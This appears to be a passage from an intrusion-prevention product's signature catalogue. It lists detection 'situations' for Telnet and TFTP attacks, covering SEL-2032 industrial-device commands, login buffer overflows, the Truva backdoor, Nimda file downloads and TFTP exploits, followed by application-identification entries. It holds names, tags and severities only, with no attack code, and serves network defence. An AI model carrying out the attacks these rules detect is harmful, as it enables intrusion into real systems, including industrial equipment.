Back to top

Telnet_Schweitzer-SEL-2032-Access-Attempt

About this situation: Schweitzer SEL-2032 Access attempt detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Access-Denied

About this situation: Schweitzer SEL-2032 access denied error detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Access-Password-Disabled

About this situation: Schweitzer SEL-2032 Access Password Disabled error detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Change-Password

About this situation: Schweitzer SEL-2032 Password change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Configuration-Traffic

About this situation: Schweitzer SEL-2032 configuration traffic detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Device-Poll-All

About this situation: Schweitzer SEL-2032 Device Poll detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Failed-Configuration-Change

About this situation: Schweitzer SEL-2032 Failed Configuration Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Failed-Time-Change

About this situation: Schweitzer SEL-2032 Failed Time Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-IP-Address-Change

About this situation: Schweitzer SEL-2032 IP Address Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Modem-Status-Changed

About this situation: Schweitzer SEL-2032 Modem Status change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Point-Not-Available

About this situation: Schweitzer SEL-2032 Point Not Available error detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Port-Configuration-Change

About this situation: Schweitzer SEL-2032 Port Configuration Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Successful-Configuration-Change

About this situation: Schweitzer SEL-2032 Successful Configuration Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Successful-Login

About this situation: Schweitzer SEL-2032 successful login detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-Time-Change

About this situation: Schweitzer SEL-2032 Time Change detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_Schweitzer-SEL-2032-View-Passwords-Attempt

About this situation: Schweitzer SEL-2032 View Passwords attempt detected
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Schweitzer SEL-2032, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Schweitzer-SEL-2032-Commands
Description:
Back to top

Telnet_SCS-Microsoft-Telnet-Client-Information-Disclosure

About this situation: Detects information disclosure attacks against the Telnet client for Microsoft Windows
Context: Telnet TCP Server Command Stream
Severity: 2
Tags: Windows XP, Windows 2003, x86, Microsoft Services for UNIX, MS2005-06, CVE2005, Windows XP not specific, Windows 2003 not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Microsoft-Telnet-Client-Information-Disclosure
Description:
Back to top

Telnet_SCS-Telnet-Client-Env-Opt-Add-Function-BOF

About this situation: Detects buffer overflow exploits against various Telnet clients
Context: Telnet TCP Server Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic telnet client, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Client-Env-Opt-Add-Function-BOF
Description:
Back to top

Telnet_SCS-Telnet-Client-Slc-Add-Reply-Function-BOF

About this situation: Detects buffer overflow exploits against various Telnet clients
Context: Telnet TCP Server Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic telnet client, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Client-Slc-Add-Reply-Function-BOF
Description:
Back to top

Telnet_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Telnet TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Telnet_STS-Cisco-Failed-Login

About this situation: Detects failed Cisco Telnet logins
Context: Telnet TCP Server Terminal Stream
Severity: 1
Tags: Cisco IOS, Any Hardware, Cisco telnetd, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Cisco-Telnetd-Failed-Login
Description:
Back to top

Telnet_STS-Failed-Login

About this situation: Detects failed Telnet logins
Context: Telnet TCP Server Terminal Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic telnet server, Any Operating System not specific, Generic telnet server not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Telnet-Failed-Login
Description:
Back to top

Telnet_STS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Telnet TCP Server Terminal Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Telnet_STS-Telnet-Root-Login-Attempt

About this situation: Root login attempt via telnet
Context: Telnet TCP Server Terminal Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Remote Control, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Vulnerability: Insecure-Root-Login
Description:
Back to top

Telnet_SysV-Login-BOF-1

About this situation: Attempt to exploit a buffer overflow in login in SysV derived systems
Context: Telnet TCP Client Stream
Severity: 10
Tags: SCO, Solaris 8, Solaris 7, IRIX 3, HP-UX 10, HP-UX 11, AIX 5, AIX 4, Any Hardware, Generic telnet server, CVE2001, Generic telnet server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SysV-Login-BOF
Description:
Back to top

Telnet_SysV-Login-BOF-2

About this situation: Attempt to exploit a buffer overflow in Solaris login
Context: Telnet TCP Client Stream
Severity: 10
Tags: Solaris 8, Solaris 7, x86, Generic telnet server, CVE2001, Generic telnet server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SysV-Login-BOF
Description:
Back to top

Telnet_SysV-Login-BOF-3

About this situation: Attempt to exploit a buffer overflow in Solaris login
Context: Telnet TCP Client Stream
Severity: 10
Tags: Solaris 8, Solaris 7, Sun Solaris 2.6, Any Hardware, Generic telnet server, CVE2001, Generic telnet server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-254-3038
Vulnerability: SysV-Login-BOF
Description:
Back to top

Telnet_TC-Schneider-Electric-PLC-ETY-Denial-Of-Service

About this situation: A vulnerability in Schneider Electric ETY series telnet server allowing denial of service.
Context: Telnet TCP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Schneider Electric PLC ETY, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Schneider-Electric-PLC-ETY-Denial-Of-Service
Description:
Back to top

Telnet_Telnet-Cisco-NX-OS-Section-And-Less-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Cisco NX-OS detected
Context: Telnet TCP Server Stream
Severity: 7
Tags: Cisco, Any Hardware, CVE2011, Cisco not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Cisco-NX-OS-Section-And-Less-Privilege-Escalation
Description:
Back to top

Telnet_Telnet-Usage

About this situation: Attempt to use the telnet protocol
Context: Telnet TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic telnet server, Any Operating System not specific, Generic telnet server not specific, Remote Control, TCP Server Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Telnet-Usage
Description:
Back to top

Telnet_Truva-Response

About this situation: Truva backdoor response detected
Context: Telnet TCP Server Stream
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-Truva
Description:
Back to top

Telogis

About this situation: Application Telogis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Telogis is a cloud-based SaaS software provider to manage mobile resources.
Back to top

TelSell

About this situation: Application TelSell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TelSellCTI is a Complete Quotes and Order Management Application designed for businesses that want to improve their sales management, simplify tasks, and decrease costs. It includes Quotes, Orders, Inventory, Invoice, Delivery, and Telemarketing.
Back to top

TELUS

About this situation: Application TELUS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TELUS is a provider mobile, home phone, Optik tv, high speed internet services.
Back to top

TemboSocial

About this situation: Application TemboSocial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TemboSocial is a provider of interactive engagement and community building solutions. Companies turn to TemboSocial's hosted suite of tools to foster collaboration, conversation and recognition among their most valuable asset - their employees.
Back to top

Temu

About this situation: Temu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Description: Temu is a Chinese e-commerce company.
Back to top

Tencent-Cloud

About this situation: Application Tencent-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Tencent Cloud is a secure, reliable and high-performance cloud compute service provided by Tencent.
Back to top

Tencent-QQ

About this situation: Tencent QQ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Tencent QQ is a free instant messaging computer program that is used mainly in China.
Back to top

Tendenci

About this situation: Application Tendenci detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tendenci is an Open Source Software Platform for nonprofit organizations and cause-related associations to manage their websites. Features include membership management, events management, online payments, rich media, and much more.
Back to top

Tender-Support

About this situation: Application Tender-Support detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tender API is a JSON REST interface for managing your discussions. It is accessible from any HTTP client with a valid login to an existing Tender site. All posted data should be sent as valid JSON, and all received data will be valid JSON.
Back to top

Tenet-Health

About this situation: Application Tenet-Health detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tenet Healthcare is a healthcare services company, with a comprehensive network that extends the US from coast to coast.
Back to top

Tenfold

About this situation: Application Tenfold detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tenfold helps companies increase revenue and build relationships with their customers by allowing them to measure, analyze and improve every aspect of the customer journey.
Back to top

Tennessee

About this situation: Application Tennessee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tennessee Hire system in order to report your new hires via online data entry or secure file upload.
Back to top

Tenrox

About this situation: Application Tenrox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud-based Project Management Software - online resource management, resource scheduling, project planning, time expense tracking, project billing cost reporting
Back to top

Tensoft-Revenue-Cycle-Management

About this situation: Application Tensoft-Revenue-Cycle-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tensoft, Inc. specializes in end-to-end business management solutions for the semiconductor, high tech and software industries.
Back to top

Teradata

About this situation: Application Teradata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teradata is a provider of analytic data platforms, marketing and analytic applications, and consulting services. Teradata helps organizations collect, integrate, and analyze all of their data so they can know more about their customers and business and do more of what is really important.
Back to top

Teramind

About this situation: Application Teramind detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Teramind is a company focused on writing state-of-the-art business management software using the latest cutting-edge technologies.
Back to top

Terapeak

About this situation: Application Terapeak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Terapeak is a source for analyzing, understanding and predicting consumer and product behavior in e-commerce.
Back to top

Teredo

About this situation: Teredo traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Teredo is a transition technology that gives IPv6 connectivity for IPv6-capable hosts which are on the IPv4 Internet but which have no direct native connection to an IPv6 network.
Back to top

Teredo-Protocol-Authenticated-Traffic

About this situation: Detected authenticated Teredo traffic
Context: UDP without parameters
Severity: 2
Tags: Tunneling Protocols
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-442-4219
Description: Authenticated Teredo traffic was detected. Teredo may use an authenticated packet to establish a routing between Teredo clients, relays, and servers.
Back to top

Teredo-Protocol-Bubble-Packet

About this situation: Detected Teredo bubble packet
Context: UDP without parameters
Severity: 2
Tags: Tunneling Protocols
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-442-4219
Description: A Teredo bubble packet was detected. Bubble packets are used to establish and maintain Teredo tunnels.
Back to top

Teredo-Protocol-Traffic

About this situation: Detected Teredo traffic
Context: UDP without parameters
Severity: 2
Tags: Tunneling Protocols
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-442-4219
Description: IPv6 traffic that has been tunneled over IPv4 using the Teredo protocol was detected.
Back to top

Test

About this situation: Application Test detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Test is the platform, where organization can author and administer training content, tests, and certifications. Test provides software solution for creating online tests and managing enterprise, and specialist certification programs.
Back to top

Test Alert

About this situation: Test Alert from Management Center
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-106-2032
Description: An Alert has been sent by an Administrator from the Management Center as part of system test.
Back to top

Test-IO

About this situation: Application Test-IO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: QA Testing as a Service helps ship apps faster with real tests by people on real devices.
Back to top

Testflight

About this situation: TestFlight usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This platform allows developers, managers and testers to distribute beta and internal iOS or Android applications to team members. Developers can manage beta testing campaigns and receive feedback from their team with the dashboard.
Back to top

TestFlightApp

About this situation: TestFlightApp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: TestFlightApp is a mobile application usage and error monitoring service.
Back to top

Testfuff

About this situation: Application Testfuff detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Testuff is a software testing solutions vendor, offering its SaaS tools for test management
Back to top

TestLodge

About this situation: Application TestLodge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TestLodge is an online test management tool. TestLodge offers both individuals and businesses the basic tools needed to manage their testing.
Back to top

TestUP

About this situation: Application TestUP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TestUP provides online pre employment tests and aptitude tests for small and medium sized businesses.
Back to top

Tetrinet

About this situation: TetriNET usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: TetriNET is a multiplayer online Tetris game for up to six people. Source: Wikipedia
Back to top

Text and Media Messaging

About this situation: Sites that enable the sending of messages and other content via SMS, EMS, MMS or similar protocols.
Context: URL Application Context
Severity: 1
Tags: Internet Communication, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable the sending of messages and other content via SMS, EMS, MMS or similar protocols.
Back to top

TEXT File

About this situation: Text file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Unidentified File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Text-United

About this situation: Application Text-United detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Text United is a Translation Platform Language Software, provides Localization Management and Professional Translators for businesses that require human translations at scale.
Back to top

Textalk

About this situation: Application Textalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Textalk provides web and IT projects. It develops e-commerce platform, technology solutions for the visually impaired, tools for data collection and customized consulting.
Back to top

Textedly

About this situation: Application Textedly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Textedly is an SMS Marketing provider which platform supports SMS text messaging all over the world.
Back to top

Texthog

About this situation: Application Texthog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Texthog is a super simple service to track your budgets and expenses online.
Back to top

Textura-Corp

About this situation: Application Textura-Corp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Textura is provider of construction management software and other collaboration and productivity tools for the construction industry.
Back to top

TFTP

About this situation: TFTP traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1207-5242
Description: TFTP is a simple file transfer protocol.
Back to top

TFTP_CS-Admin-DLL-Download-Request

About this situation: Detected Admin.dll file download attempt over TFTP
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Nimda, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Worm-Nimda
Description:
Back to top

TFTP_CS-Atftp-TFTP-Server-Error-Packet-DoS

About this situation: An attempt to exploit a vulnerability in atftp TFTP Server detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, atftpd, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Atftp-TFTP-Server-Error-Packet-DoS
Description:
Back to top

TFTP_CS-Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Infrastructure detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload
Description:
Back to top

TFTP_CS-Executable-File-Upload

About this situation: Executable file transfer detected
Context: TFTP Client Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-370-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, HP Intelligent Management Center, CVE2011, CVE2019, Windows not specific, HP Intelligent Management Center not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-391-4219
Vulnerability: TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF
Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow
Description:
Back to top

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, HP Intelligent Management Center, CVE2011, Windows not specific, HP Intelligent Management Center not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-391-4219
Vulnerability: TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec
Description:
Back to top

TFTP_CS-Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: TFTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2013, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Vulnerability: Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service
Description:
Back to top

TFTP_CS-Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal
Description:
Back to top

TFTP_CS-Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2010, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow
Description:
Back to top

TFTP_CS-Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Desktop Management on Linux detected
Context: TFTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Novell ZENworks Desktop Management, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-754-5211
Vulnerability: Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution
Description:
Back to top

